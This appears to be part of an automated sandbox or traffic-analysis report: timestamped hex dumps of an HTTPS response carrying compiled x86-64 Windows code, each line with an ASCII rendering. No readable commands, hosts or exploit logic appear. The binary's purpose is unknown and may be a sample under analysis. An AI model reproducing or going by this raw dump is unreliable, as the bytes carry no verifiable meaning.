                                                                                                                                                                                                                    Data Ascii: AJIIpEtL$cqIEtLcqHQpHtHPpHJxHHpHtHHHHH;ApHQxLbqHBxH:EtLbqHubAHQxLBpLAxMtIL
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3521INData Raw: 89 c1 e9 85 fe ff ff 0f 1f 40 00 ff 15 e6 5f 79 00 89 c1 e9 74 fe ff ff 0f 1f 00 41 54 56 53 48 83 ec 20 48 89 cb 41 89 d4 4c 89 ce f6 41 58 80 74 41 41 c7 00 01 00 00 00 48 8b 89 10 01 00 00 49 89 f0 44 89 e2 ff 15 a3 5f 79 00 85 c0 75 72 8b 93 18 01 00 00 89 96 74 02 00 00 81 4b 58 00 00 00 10 48 83 c4 20 5b 5e 41 5c c3 0f 1f 80 00 00 00 00 41 c7 00 02 00 00 00 8b 41 58 a8 40 75 2a f6 c4 20 74 55 8b 83 18 01 00 00 48 8b 89 10 01 00 00 85 c0 75 a9 ba ff ff ff 7f ff 15 1d 60 79 00 83 f8 ff 74 44 0f 1f 40 00 48 8b 8b 10 01 00 00 49 89 f0 44 89 e2 ff 15 31 5f 79 00 85 c0 74 8e 48 83 c4 20 5b 5e 41 5c 48 ff 25 26 5f 79 00 66 2e 0f 1f 84 00 00 00 00 00 b8 32 00 00 00 eb 81 66 0f 1f 84 00 00 00 00 00 ff 15 06 5f 79 00 89 83 18 01 00 00 eb b2 66 90 41 55 41 54
                                                                                                                                                                                                                    Data Ascii: @_ytATVSH HALAXtAAHID_yurtKXH [^A\AAX@u* tUHu`ytD@HID1_ytH [^A\H%&_yf.2f_yfAUAT
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3537INData Raw: 66 66 2e 0f 1f 84 00 00 00 00 00 48 83 ec 68 ba 01 00 00 00 48 8d 0d a8 e3 70 00 e8 db d2 ff ff 85 c0 0f 85 69 bc 28 00 c7 44 24 28 00 00 00 00 45 31 c9 41 b8 02 00 00 00 ba 00 00 00 c0 48 c7 44 24 30 00 00 00 00 48 8d 0d 65 0a 39 00 c7 44 24 20 03 00 00 00 ff 15 d3 13 79 00 48 89 05 d8 89 29 00 48 83 f8 ff 74 57 31 d2 41 b8 10 00 00 00 48 8d 0d 63 d7 ff ff ff 15 89 17 79 00 48 8d 0d 46 e3 70 00 e8 11 cf ff ff 48 8b 0d aa 89 29 00 48 8d 54 24 40 ff 15 b3 14 79 00 85 c0 74 20 0f bf 44 24 40 0f bf 54 24 4c 89 05 83 89 29 00 0f bf 44 24 50 29 d0 83 c0 01 89 05 77 89 29 00 48 83 c4 68 c3 66 0f 1f 44 00 00 41 56 41 55 41 54 55 57 56 53 48 83 c4 80 44 89 c6 48 89 cf 48 89 d3 e8 14 3d fe ff 89 f1 ff 15 68 1a 79 00 48 89 44 24 50 48 89 c1 48 83 f8 ff 0f 84 da 03
                                                                                                                                                                                                                    Data Ascii: ff.HhHpi(D$(E1AHD$0He9D$ yH)HtW1AHcyHFpH)HT$@yt D$@T$L)D$P)w)HhfDAVAUATUWVSHDHH=hyHD$PHH
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3553INData Raw: 34 e9 e6 fe ff ff 41 b8 90 03 00 00 48 8d 15 58 d0 38 00 48 8d 0d 19 d2 38 00 ff 15 9f da 78 00 e8 0e 51 0c 00 90 0f 1f 44 00 00 48 83 ec 48 48 8b 49 70 89 54 24 3c 48 83 f9 ff 74 46 4c 8d 4c 24 3c 41 b8 20 00 00 00 ba ff ff 00 00 c7 44 24 20 04 00 00 00 ff 15 8c e0 78 00 85 c0 75 0c 48 83 c4 48 c3 0f 1f 80 00 00 00 00 ff 15 86 df 78 00 89 c1 e8 43 0f fe ff 48 83 c4 48 c3 66 0f 1f 44 00 00 b8 0d f0 ff ff eb d5 90 48 81 ec c8 00 00 00 48 8b 15 fe df 78 00 c7 44 24 20 00 00 00 00 4c 8d 44 24 40 4c 8d 4c 24 3c c7 44 24 3c 80 00 00 00 e8 63 0a fe ff 41 89 c0 31 c0 45 85 c0 75 0b 8b 54 24 3c 31 c0 85 d2 0f 9f c0 48 81 c4 c8 00 00 00 c3 66 0f 1f 44 00 00 56 53 48 81 ec 48 03 00 00 41 b8 05 20 00 00 48 89 d6 48 8d 44 24 38 48 89 cb c7 44 24 38 74 02 00 00 48 89
                                                                                                                                                                                                                    Data Ascii: 4AHX8H8xQDHHHIpT$<HtFLL$<A D$ xuHHxCHHfDHHxD$ LD$@LL$<D$<cA1EuT$<1HfDVSHHA HHD$8HD$8tH
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3569INData Raw: 4c 89 64 24 30 c7 44 24 48 20 00 00 00 48 89 5c 24 40 c7 44 24 38 20 00 00 00 c7 44 24 28 24 20 01 00 ff 10 41 89 c4 45 85 e4 74 6f 41 81 fc 03 01 00 00 75 26 b9 e5 03 00 00 41 bc ff ff ff ff ff 15 e9 9f 78 00 44 89 e0 48 83 c4 68 5b 41 5c 41 5d 41 5e c3 66 0f 1f 44 00 00 44 89 e1 e8 e8 f8 ff ff 89 c3 89 c1 ff 15 c2 9f 78 00 f7 db 45 19 e4 44 89 e0 48 83 c4 68 5b 41 5c 41 5d 41 5e c3 66 2e 0f 1f 84 00 00 00 00 00 48 83 e2 fe 45 31 c9 e9 51 ff ff ff 0f 1f 40 00 31 c9 ff 15 8c 9f 78 00 44 89 e0 48 83 c4 68 5b 41 5c 41 5d 41 5e c3 66 0f 1f 84 00 00 00 00 00 45 31 c9 45 31 c0 31 d2 31 c9 ff 15 44 93 78 00 49 89 c6 48 85 c0 0f 84 7e 00 00 00 48 8d 44 24 50 4c 89 64 24 30 45 31 c9 45 31 c0 48 89 44 24 20 48 8b 05 f8 e7 3d 00 4c 89 f2 4c 89 e9 c7 44 24 50 03 01
                                                                                                                                                                                                                    Data Ascii: Ld$0D$H H\$@D$8 D$($ AEtoAu&AxDHh[A\A]A^fDDxEDHh[A\A]A^f.HE1Q@1xDHh[A\A]A^fE1E111DxIH~HD$PLd$0E1E1HD$ H=LLD$P
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3585INData Raw: 80 00 00 00 00 48 8b 54 24 38 0f 84 c9 0b 00 00 48 8b 73 78 45 31 e4 48 85 f6 0f 85 7b fe ff ff 0f 1f 00 44 39 63 68 74 1a 41 b8 18 12 00 00 48 8d 15 75 5e 38 00 48 8d 0d b2 69 38 00 ff 15 7c 5a 78 00 48 8b 43 70 48 8b 08 48 39 4b 78 74 1e 41 b8 1a 12 00 00 48 8d 15 4e 5e 38 00 48 8d 0d 9f 69 38 00 ff 15 55 5a 78 00 48 8b 43 70 8b 53 68 83 ea 01 48 8b 04 d0 48 39 83 80 00 00 00 74 1a 41 b8 1b 12 00 00 48 8d 15 1d 5e 38 00 48 8d 0d 9e 69 38 00 ff 15 24 5a 78 00 83 3b 03 0f 84 e7 07 00 00 44 8b 93 8c 00 00 00 48 8b b3 90 00 00 00 45 85 d2 0f 84 70 05 00 00 48 85 f6 0f 84 a7 0a 00 00 45 31 f6 45 31 e4 4c 8d 2d da 5d 38 00 4c 8d 3d db 69 38 00 eb 04 90 48 89 c6 8b 06 83 f8 0d 74 17 83 f8 12 74 12 41 b8 69 12 00 00 4c 89 ea 4c 89 f9 ff 15 c3 59 78 00 4c 89 74
                                                                                                                                                                                                                    Data Ascii: HT$8HsxE1H{D9chtAHu^8Hi8|ZxHCpHH9KxtAHN^8Hi8UZxHCpShHH9tAH^8Hi8$Zx;DHEpHE1E1L-]8L=i8HttAiLLYxLt
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3601INData Raw: e9 d6 fc ff ff 66 0f 1f 44 00 00 4c 8b 76 28 45 8b 46 08 45 85 c0 0f 84 16 fc ff ff 45 89 c4 4c 8b 7b 28 49 c1 e4 04 48 85 ff 0f 84 c8 00 00 00 4c 89 e2 48 89 f9 ff 17 4c 8b 76 28 48 8b 53 28 49 89 47 10 48 8b 4a 10 4d 89 e0 49 8b 56 10 e8 ef 91 0b 00 e9 d9 fb ff ff 66 90 41 b8 54 03 00 00 48 8d 15 43 1e 38 00 48 8d 0d 67 31 38 00 ff 15 4a 1a 78 00 44 8b 46 10 8b 16 48 85 db 0f 85 bd fa ff ff 4c 89 e9 e8 ff f8 ff ff 48 89 c3 48 85 c0 74 74 44 8b 46 10 8b 16 e9 a2 fa ff ff 0f 1f 40 00 4c 89 f1 e8 80 91 0b 00 48 89 c1 e9 29 fb ff ff 0f 1f 84 00 00 00 00 00 4c 89 f1 e8 68 91 0b 00 48 89 c1 e9 d1 fa ff ff 48 8b be 90 00 00 00 45 31 e4 48 85 ff 0f 85 9d fc ff ff e9 bd fc ff ff 0f 1f 84 00 00 00 00 00 48 89 d1 e8 38 91 0b 00 e9 68 fe ff ff 4c 89 e1 e8 2b 91 0b
                                                                                                                                                                                                                    Data Ascii: fDLv(EFEEL{(IHLHLv(HS(IGHJMIVfATHC8Hg18JxDFHLHHttDF@LH)LhHHE1HH8hL+
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3617INData Raw: 00 00 4c 89 e1 e8 f1 9a 00 00 4c 89 e1 e8 29 9c 00 00 4c 89 e1 e8 31 b5 00 00 4c 89 e1 e8 e9 e8 00 00 41 c7 84 24 cc 00 00 00 00 00 00 00 e8 e8 b9 00 00 49 89 84 24 b8 01 00 00 e8 db b9 00 00 45 8b ac 24 28 03 00 00 49 89 84 24 c0 01 00 00 41 f6 c5 01 0f 85 89 03 00 00 41 f6 c5 02 0f 85 d7 03 00 00 49 8b 44 24 18 48 8b 00 48 8b 00 48 8b 88 b8 00 00 00 48 85 c9 0f 84 5c 09 00 00 e8 77 cd 00 00 85 c0 0f 85 4f 09 00 00 41 83 e5 04 0f 85 d5 05 00 00 49 8b 84 24 80 02 00 00 48 85 c0 74 30 45 8b 8c 24 c4 00 00 00 45 85 c9 74 23 f6 44 24 3c 02 75 1c 41 f6 44 24 20 04 0f 84 98 08 00 00 4c 89 e1 ff d0 83 4c 24 3c 02 66 0f 1f 44 00 00 49 8b 44 24 18 49 8d 9c 24 38 03 00 00 48 8b 00 48 8b 00 48 8b 88 d0 00 00 00 e8 09 cd 00 00 85 c0 0f 85 71 03 00 00 49 8b 8c 24 48
                                                                                                                                                                                                                    Data Ascii: LL)L1LA$I$E$(I$AAID$HHHH\wOAI$Ht0E$Et#D$<uAD$ LL$<fDID$I$8HHHqI$H
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3633INData Raw: 39 c8 75 e7 31 c0 48 83 c4 38 5b 5e 5f 5d 41 5c 41 5d 41 5e 41 5f c3 0f 1f 40 00 41 83 fc ff 0f 84 5b ff ff ff 41 83 4d 34 01 41 89 7d 18 49 89 5d 38 4d 89 75 20 45 89 65 0c 49 c7 45 10 00 00 00 00 49 89 6d 28 41 83 fc 03 75 2f 8d 57 ff 31 c0 48 c1 e2 03 eb 0d 0f 1f 40 00 48 8b 74 03 08 48 83 c0 08 8b 7e 10 49 89 3c 06 48 39 c2 75 eb eb 92 66 0f 1f 84 00 00 00 00 00 41 83 fc 0d 74 cb e9 53 ff ff ff 0f 1f 44 00 00 ff 15 66 9a 77 00 c7 00 16 00 00 00 49 8b 4d 00 e8 13 11 0b 00 49 8b 4d 20 e8 0a 11 0b 00 49 8b 4d 38 e8 01 11 0b 00 49 8b 4d 10 e8 f8 10 0b 00 49 8b 4d 28 e8 ef 10 0b 00 4c 89 e9 e8 e7 10 0b 00 b8 ff ff ff ff e9 30 ff ff ff ff 15 1b 9a 77 00 c7 00 02 00 00 00 eb b3 4c 89 f1 e8 c7 10 0b 00 eb a9 66 66 2e 0f 1f 84 00 00 00 00 00 66 90 41 57 41 56
                                                                                                                                                                                                                    Data Ascii: 9u1H8[^_]A\A]A^A_@A[AM4A}I]8Mu EeIEIm(Au/W1H@HtH~I<H9ufAtSDfwIMIM IM8IMIM(L0wLff.fAWAV
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3649INData Raw: 41 b8 cf 00 00 00 48 8d 15 6e 86 37 00 48 8d 0d ca 87 37 00 ff 15 a5 5a 77 00 48 8b 8c 24 a8 00 00 00 e8 d4 4d 00 00 85 c0 0f 85 bf 02 00 00 83 44 24 30 01 49 83 c6 28 8b 44 24 30 3b 44 24 34 0f 83 dc 02 00 00 49 8b 5e e0 48 8b 8c 24 a8 00 00 00 48 89 da e8 71 60 00 00 89 c2 83 e2 fd 83 fa 01 75 8f 8b 44 24 48 48 8b 7c 24 38 48 8d 04 80 4c 8d 24 c7 e8 41 39 00 00 48 8b 94 24 a8 00 00 00 41 c7 44 24 08 ff ff ff ff 49 89 04 24 48 89 c1 8b 84 24 b0 00 00 00 4d 8b 46 e0 41 89 44 24 0c e8 64 52 00 00 41 8b 46 f8 49 8b 2e 85 c0 0f 84 96 00 00 00 83 e8 01 4c 89 74 24 40 4d 8d 7c 24 20 48 c1 e0 04 4c 8d 6c 05 10 49 8d 44 24 18 48 89 44 24 28 0f 1f 44 00 00 41 8b 44 24 18 48 8b 7d 08 48 8b 5d 00 85 c0 74 3f 4d 8b 74 24 20 83 e8 01 48 c1 e0 04 49 8d 74 06 10 66 0f
                                                                                                                                                                                                                    Data Ascii: AHn7H7ZwH$MD$0I(D$0;D$4I^H$Hq`uD$HH|$8HL$A9H$AD$I$H$MFAD$dRAFI.Lt$@M|$ HLlID$HD$(DAD$H}H]t?Mt$ HItf
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3665INData Raw: ff 45 85 d2 0f 84 7c 00 00 00 85 db 0f 88 49 ff ff ff 4c 8b 47 08 48 63 c3 eb 0c 48 83 e8 01 85 c0 0f 88 34 ff ff ff 41 83 3c 80 ff 89 c3 74 eb b9 01 00 00 00 85 db 0f 88 1e ff ff ff 4c 8b 47 08 e9 b6 fe ff ff 0f 1f 44 00 00 4c 89 e2 4c 8d 05 1c 50 37 00 4c 89 f1 e8 0e f8 ff ff ba ff ff ff ff 85 c0 0f 49 d0 41 89 d5 e9 f5 fe ff ff 0f 1f 40 00 48 85 db 0f 8e 7c ff ff ff 8d 43 ff 48 98 e9 69 ff ff ff b9 01 00 00 00 e9 40 fe ff ff 66 66 2e 0f 1f 84 00 00 00 00 00 41 54 56 53 48 83 ec 20 49 89 d0 48 89 ce 48 89 d3 31 c9 31 d2 e8 e6 fd ff ff 44 8d 60 01 4d 63 e4 4c 89 e1 e8 67 91 0a 00 48 89 c1 48 85 c0 74 16 49 89 d8 4c 89 e2 48 89 06 48 83 c4 20 5b 5e 41 5c e9 b9 fd ff ff 83 c8 ff 48 83 c4 20 5b 5e 41 5c c3 66 66 2e 0f 1f 84 00 00 00 00 00 66 90 53 48 83 ec
                                                                                                                                                                                                                    Data Ascii: E|ILGHcH4A<tLGDLLP7LIA@H|CHi@ff.ATVSH IHH11D`McLgHHtILHH [^A\H [^A\ff.fSH
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3681INData Raw: 3c 01 00 00 00 e8 91 e3 fe ff 8b 44 24 3c 83 f8 03 0f 84 ec 00 00 00 83 f8 01 0f 85 8b 00 00 00 48 8d 04 db 4c 89 f1 4d 89 e9 4c 89 e2 4d 8b 44 c4 70 e8 24 fe ff ff 4c 89 e9 48 83 c4 48 5b 5e 5f 5d 41 5c 41 5d 41 5e 41 5f e9 fc b9 ff ff 0f 1f 40 00 85 f6 0f 85 d0 00 00 00 41 b8 ae 03 00 00 48 8d 15 23 1a 37 00 48 8d 0d 02 1b 37 00 ff 15 4a da 76 00 e9 05 ff ff ff 90 41 b8 ad 03 00 00 48 8d 15 03 1a 37 00 48 8d 0d a4 1a 37 00 ff 15 2a da 76 00 e9 e5 fe ff ff 90 44 89 fa 4c 89 e9 e8 05 c8 ff ff e9 38 ff ff ff 45 89 f8 89 f2 4c 89 f1 e8 d3 b8 fe ff 4c 89 e9 48 89 c7 e8 78 ba ff ff 48 89 87 b8 00 00 00 83 fe 0d 0f 84 90 00 00 00 48 8d 04 db 48 89 fa 49 8d 4c c4 38 e8 87 fc ff ff 49 89 f8 31 d2 4c 89 f1 4c 8d 0d 03 1b 37 00 e8 23 c0 fe ff e9 23 ff ff ff 66 0f
                                                                                                                                                                                                                    Data Ascii: <D$<HLMLMDp$LHH[^_]A\A]A^A_@AH#7H7JvAH7H7*vDL8ELLHxHHHIL8I1LL7##f
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3697INData Raw: d8 48 8d 15 3c e9 36 00 4c 89 f9 41 ff 57 10 49 8b 46 28 e9 a4 f9 ff ff 4e 8d 44 c9 08 bb ff ff ff ff 66 0f 1f 84 00 00 00 00 00 48 8b 01 0f 1f 44 00 00 48 8b 40 48 8b 10 83 fa 0d 74 f5 83 fa 12 74 f0 8b 40 30 39 c3 8d 50 01 0f 4e da 48 83 c1 08 49 39 c8 75 d4 e9 d0 fd ff ff 44 0f b6 48 1e 44 0f b7 40 1c 48 8d 15 67 e9 36 00 48 89 d9 0f b6 40 1f 89 44 24 20 e8 9e f0 ff ff 49 89 d8 48 8d 15 5e e9 36 00 4c 89 f9 41 ff 57 10 49 8b 46 28 e9 06 f9 ff ff 41 83 fc 0d 0f 84 b4 00 00 00 48 8b 8c 24 a8 02 00 00 44 89 e2 4c 8d bc 24 80 00 00 00 48 8d 9c 24 40 01 00 00 e8 6a cc fe ff 48 8b 8c 24 a0 02 00 00 4c 8d 05 d8 e9 36 00 4c 89 fa 89 c6 ff 51 08 45 31 c0 48 8d 15 1c e8 36 00 48 89 d9 e8 31 f0 ff ff 49 89 d8 48 8d 15 be e9 36 00 4c 89 f9 ff 94 24 90 00 00 00 41
                                                                                                                                                                                                                    Data Ascii: H<6LAWIF(NDfHDH@Htt@09PNHI9uDHD@Hg6H@D$ IH^6LAWIF(AH$DL$H$@jH$L6LQE1H6H1IH6L$A
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3713INData Raw: 00 00 4c 89 f1 e8 21 d3 09 00 48 8b b4 24 78 01 00 00 83 3e 0c 0f 85 f8 00 00 00 48 8b 56 28 88 42 0c e9 14 d4 ff ff 48 8d 84 24 98 00 00 00 4c 8d 4c 24 7c 4c 89 f1 48 89 44 24 38 48 8d 84 24 90 00 00 00 4c 8d 44 24 78 48 89 44 24 30 48 8d 84 24 88 00 00 00 48 8d 15 36 b3 36 00 48 89 44 24 28 48 8d 84 24 80 00 00 00 48 89 44 24 20 e8 57 cd ff ff 83 f8 06 0f 84 cd 00 00 00 e8 d9 d2 ff ff 85 c0 0f 84 b1 d3 ff ff 48 8b 45 08 b9 02 00 00 00 4c 8b 60 48 ff 15 3e ce 26 00 4d 89 f1 48 8d 15 0c b3 36 00 48 89 c1 4d 89 e0 e8 89 ae ff ff e9 84 d3 ff ff 48 8d 15 83 a9 36 00 48 89 f1 e8 fd d1 09 00 85 c0 0f 85 ea 00 00 00 41 83 ec 0e 41 83 fc 01 0f 86 ba 00 00 00 e8 7a d2 ff ff 85 c0 0f 84 52 d3 ff ff 48 8b 45 08 b9 02 00 00 00 4c 8b 60 48 ff 15 df cd 26 00 48 8d 15
                                                                                                                                                                                                                    Data Ascii: L!H$x>HV(BH$LL$|LHD$8H$LD$xHD$0H$H66HD$(H$HD$ WHEL`H>&MH6HMH6HAAzRHEL`H&H
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3729INData Raw: 48 8b 8c 24 a8 00 00 00 e8 a6 91 09 00 44 89 e0 48 81 c4 f0 00 00 00 5b 5e 41 5c 41 5d 41 5e c3 0f 1f 00 41 b8 f7 08 00 00 48 8d 15 90 68 36 00 48 8d 0d a5 6b 36 00 ff 15 82 1a 76 00 e9 31 ff ff ff 66 0f 1f 84 00 00 00 00 00 41 55 41 54 55 57 56 53 48 81 ec f8 00 00 00 48 8d 44 24 60 89 d7 4c 89 c3 4c 89 cd 48 89 44 24 38 48 89 ce 48 8d 0d 71 89 36 00 ff 15 7b 1b 76 00 48 89 84 24 a8 00 00 00 e8 22 cb fe ff 48 83 3d fa ed 6d 00 00 0f 84 b4 00 00 00 48 c7 03 00 00 00 00 4c 8d 6c 24 30 e8 93 6d ff ff 4c 8b 1d d4 ed 6d 00 4c 8b 15 d5 ed 6d 00 4d 85 db 74 46 4d 85 d2 74 04 85 c0 75 3d 48 89 6c 24 28 41 89 f9 49 89 f0 31 d2 48 89 5c 24 20 4c 89 e9 41 ff 53 20 41 89 c4 85 c0 79 39 ff 15 0d 1a 76 00 83 38 28 75 2e 48 c7 05 89 ed 6d 00 00 00 00 00 4c 8b 15 8a ed
                                                                                                                                                                                                                    Data Ascii: H$DH[^A\A]A^AHh6Hk6v1fAUATUWVSHHD$`LLHD$8HHq6{vH$"H=mHLl$0mLmLmMtFMtu=Hl$(AI1H\$ LAS Ay9v8(u.HmL
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3745INData Raw: 8b 15 ad 4b 26 00 48 c1 e6 20 89 c0 48 09 c6 83 fa 01 74 57 48 83 3d c7 ae 6d 00 00 74 65 83 fa 01 76 48 31 c0 45 31 c0 c7 44 24 2a 00 00 00 00 4c 89 f1 66 89 44 24 2e 48 8d 54 24 20 66 89 5c 24 28 48 89 74 24 20 ff 15 96 ae 6d 00 85 c0 b8 ff ff ff ff 44 0f 44 e8 44 89 e8 48 83 c4 38 5b 5e 41 5c 41 5d 41 5e 41 5f c3 90 48 89 f2 4c 89 f1 ff 15 c8 d8 75 00 48 83 f8 01 45 19 ed eb d8 0f 1f 00 48 8d 15 81 4e 36 00 41 b8 39 02 00 00 48 8d 0d 8c 4e 36 00 ff 15 22 da 75 00 8b 15 10 4b 26 00 e9 76 ff ff ff 0f 1f 00 ff 15 46 da 75 00 41 bd ff ff ff ff c7 00 28 00 00 00 eb 99 66 66 2e 0f 1f 84 00 00 00 00 00 90 41 54 56 53 48 83 ec 20 48 89 d3 44 89 c6 49 89 cc ff 15 9d d4 75 00 41 89 f1 49 89 d8 4c 89 e1 48 89 c2 48 83 c4 20 5b 5e 41 5c e9 90 fe ff ff 48 83 ec 28
                                                                                                                                                                                                                    Data Ascii: K&H HtWH=mtevH1E1D$*LfD$.HT$ f\$(Ht$ mDDDH8[^A\A]A^A_HLuHEHN6A9HN6"uK&vFuA(ff.ATVSH HDIuAILHH [^A\H(
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3761INData Raw: a8 1f 74 1f c1 e8 1a 31 d2 8d 48 01 8b 44 24 44 f7 f1 31 d2 89 c1 8b 44 24 40 f7 f1 89 43 0c 0f 1f 40 00 83 bc 24 f8 00 00 00 19 0f 86 11 fe ff ff 48 8b 84 24 08 01 00 00 f6 40 49 80 0f 84 ff fd ff ff 48 89 7c 24 20 48 8b 54 24 50 4d 89 e9 4c 8b 44 24 58 48 8b 4c 24 48 c7 44 24 60 1a 00 00 00 c7 44 24 68 00 00 00 00 e8 0c e2 ff ff 8b 44 24 60 44 8b 4c 24 3c 89 c2 25 ff ff ff 00 c1 ea 18 85 f6 89 83 90 00 00 00 89 93 8c 00 00 00 0f 94 c0 45 85 c9 0f 85 b9 fd ff ff 0f 1f 80 00 00 00 00 83 bc 24 f8 00 00 00 1e 0f 86 9a 05 00 00 84 c0 0f 84 92 05 00 00 49 89 f8 ba 1f 00 00 00 4c 8d 6c 24 7c 48 89 d9 e8 dd e2 ff ff 48 8d 6c 24 78 4c 8d 74 24 74 c7 43 34 00 00 00 00 48 c7 43 38 00 00 00 00 4c 8d 64 24 70 45 31 ff 89 b4 24 10 01 00 00 48 89 de 44 89 fb 4c 8b bc
                                                                                                                                                                                                                    Data Ascii: t1HD$D1D$@C@$H$@IH|$ HT$PMLD$XHL$HD$`D$hD$`DL$<%E$ILl$|HHl$xLt$tC4HC8Ld$pE1$HDL
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3777INData Raw: 42 0f b6 54 03 06 43 32 54 02 06 09 d0 0f b6 c0 83 e8 01 b8 dd ff ff ff 44 0f 49 c8 44 89 c8 48 83 c4 60 5b 5e 5f c3 31 c0 45 31 c0 e9 96 fe ff ff 66 2e 0f 1f 84 00 00 00 00 00 57 56 53 48 83 ec 60 48 89 ce 48 89 d3 e8 4e 0f 00 00 41 89 c1 85 c0 0f 85 04 02 00 00 45 31 c9 45 31 c0 ba 01 00 00 00 48 89 f1 e8 a0 da ff ff 41 89 c1 85 c0 0f 85 e6 01 00 00 44 8b 5e 08 4c 8b 16 4d 85 db 0f 84 d6 01 00 00 49 8d 43 ff 48 83 f8 0e 0f 86 d3 01 00 00 4c 89 da 31 c0 66 0f ef c0 83 e2 f0 0f 1f 00 f3 0f 6f 0c 03 f3 41 0f 6f 14 02 48 83 c0 10 66 0f ef ca 66 0f eb c1 48 39 d0 75 e4 66 0f 6f c8 4d 89 d8 66 0f 73 d9 08 49 83 e0 f0 66 0f eb c1 66 0f 6f c8 66 0f 73 d9 04 66 0f eb c1 66 0f 6f c8 66 0f 73 d9 02 66 0f eb c1 66 0f 6f c8 66 0f 73 d9 01 66 0f eb c1 66 0f 7e c0 4d
                                                                                                                                                                                                                    Data Ascii: BTC2TDIDH`[^_1E1f.WVSH`HHNAE1E1HAD^LMICHL1foAoHffH9ufoMfsIffofsffofsffofsff~M
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3793INData Raw: 24 b8 01 00 00 48 89 bc 24 88 00 00 00 48 bf f1 36 1d 5f 3a f5 4f a5 48 89 ac 24 90 00 00 00 48 bd d1 82 e6 ad 7f 52 0e 51 48 89 84 24 80 00 00 00 8b 84 24 b8 01 00 00 48 89 bc 24 98 00 00 00 48 bf 1f 6c 3e 2b 8c 68 05 9b 48 89 ac 24 a0 00 00 00 48 bd 6b bd 41 fb ab d9 83 1f 48 89 bc 24 a8 00 00 00 48 89 ac 24 b0 00 00 00 89 84 24 d0 00 00 00 48 c7 84 24 50 01 00 00 04 00 00 00 0f 11 84 24 c0 00 00 00 e8 bf fc ff ff 4c 8b 84 24 b8 01 00 00 4c 89 e2 4c 89 e9 e8 1c fe ff ff 90 48 81 c4 68 01 00 00 5b 5e 5f 5d 41 5c 41 5d 41 5e 41 5f c3 0f 1f 80 00 00 00 00 48 bd 2b f8 94 fe 72 f3 6e 3c 48 8d 9c 24 80 00 00 00 66 0f ef c0 48 b8 79 21 7e 13 19 cd e0 5b 48 89 ac 24 90 00 00 00 48 89 d9 48 bf 3b a7 ca 84 85 ae 67 bb 48 bd d1 82 e6 ad 7f 52 0e 51 48 89 84 24 b8
                                                                                                                                                                                                                    Data Ascii: $H$H6_:OH$HRQH$$H$Hl>+hH$HkAH$H$$H$P$L$LLHh[^_]A\A]A^A_H+rn<H$fHy!~[H$HH;gHRQH$
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3809INData Raw: 0e 48 8b b4 24 a0 00 00 00 48 8d 04 48 49 31 c0 49 c1 c8 18 44 89 c1 4c 01 c2 49 0f af ca 48 8d 2c 4a 89 c1 49 31 e9 49 c1 c9 10 44 89 ca 4c 01 c8 48 0f af d1 48 8d 14 50 89 f0 4c 01 e6 48 89 54 24 30 49 31 d0 44 89 e2 48 0f af d0 49 d1 c0 48 8d 0c 56 48 8b b4 24 00 03 00 00 48 31 ce 48 89 f0 48 8b b4 24 20 02 00 00 48 c1 c0 20 41 89 f2 89 c2 49 0f af d2 4c 8d 14 06 89 ce 49 8d 14 52 49 31 d4 4d 89 e2 49 c1 ca 18 44 89 d3 4c 01 d1 48 0f af de 48 8d 34 59 89 d3 48 31 f0 48 c1 c8 10 89 c1 48 01 c2 48 0f af cb 4c 8d 24 4a 89 fa 44 89 f9 4c 01 ff 48 0f af ca 44 89 f2 4d 31 e2 49 d1 c2 48 8d 1c 4f 48 8b 8c 24 18 03 00 00 48 31 d9 48 c1 c1 20 89 cf 48 0f af fa 4c 89 f2 48 01 ca 48 8d 3c 7a 4c 89 fa 41 89 df 48 31 fa 48 c1 ca 18 41 89 d6 48 01 d3 4d 0f af f7 41
                                                                                                                                                                                                                    Data Ascii: H$HHI1IDLIH,JI1IDLHHPLHT$0I1DHIHVH$H1HH$ H AILIRI1MIDLHH4YH1HHHL$JDLHDM1IHOH$H1H HLHH<zLAH1HAHMA
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3825INData Raw: 31 c2 45 01 da 41 89 cb 41 c1 cb 0b 45 31 eb 41 89 cd 41 c1 c5 07 45 31 eb 45 89 cd 45 01 da 45 89 cb 41 c1 cd 0d 41 c1 cb 02 44 01 d2 45 31 dd 45 89 cb 41 c1 c3 0a 45 31 eb 31 de 41 89 ed 41 01 f3 8b 74 24 18 41 c1 c5 0f 45 01 d3 44 8b 54 24 18 c1 ce 07 45 89 df 41 c1 c2 0e 41 c1 cf 0d 41 31 f2 8b 74 24 18 c1 ee 03 41 31 f2 89 ee 44 03 54 24 14 44 03 54 24 38 c1 c6 0d 44 31 ee 41 89 ed 41 c1 ed 0a 44 31 ee 41 89 d5 44 01 d6 45 89 c2 41 c1 cd 06 41 31 ca 8d 84 30 b5 bc b0 34 41 21 d2 45 31 c2 41 01 c2 89 d0 c1 c8 0b 44 31 e8 41 89 d5 41 c1 c5 07 44 31 e8 45 89 cd 41 01 c2 44 89 d8 45 31 dd c1 c8 02 45 01 d4 41 31 c7 44 89 d8 c1 c0 0a 44 31 f8 45 21 ee 41 89 ff 45 31 ce 41 c1 c7 0f 44 01 f0 44 8b 74 24 1c 44 01 d0 44 8b 54 24 1c 41 c1 ce 07 41 c1 c2 0e 45
                                                                                                                                                                                                                    Data Ascii: 1EAAE1AAE1EEEAADE1EAE11AAt$AEDT$EAAA1t$A1DT$DT$8D1AAD1ADEAA104A!E1AD1AAD1EADE1EA1DD1E!AE1ADDt$DDT$AAE
